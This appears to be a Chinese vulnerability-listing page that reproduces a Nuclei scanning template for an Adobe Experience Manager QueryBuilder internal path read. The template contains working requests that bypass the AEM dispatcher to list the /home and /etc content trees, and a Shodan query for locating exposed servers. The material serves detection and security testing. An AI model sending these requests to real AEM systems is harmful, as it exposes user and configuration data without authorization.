aem-querybuilder-internal-path-read: AEM QueryBuilder Internal Path Read

日期: 2025-08-01 | 影响软件: aem | POC: 已公开

漏洞描述

AEM QueryBuilder is vulnerable to LFI.

PoC代码[已公开]

id: aem-querybuilder-internal-path-read

info:
  name: AEM QueryBuilder Internal Path Read
  author: DhiyaneshDk
  severity: medium
  description: AEM QueryBuilder is vulnerable to LFI.
  reference:
    - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
  classification:
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'jcr:path'
          - 'success'
        condition: and
# digest: 4b0a00483046022100c3adcdae83c67fe1d9c055cb97d04233c3c0f231395644a14101a5c4433ac6b7022100f213d7ff2c82a82693d0f45caaa17554bc67a0457e28f960277c456e5a1816d9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐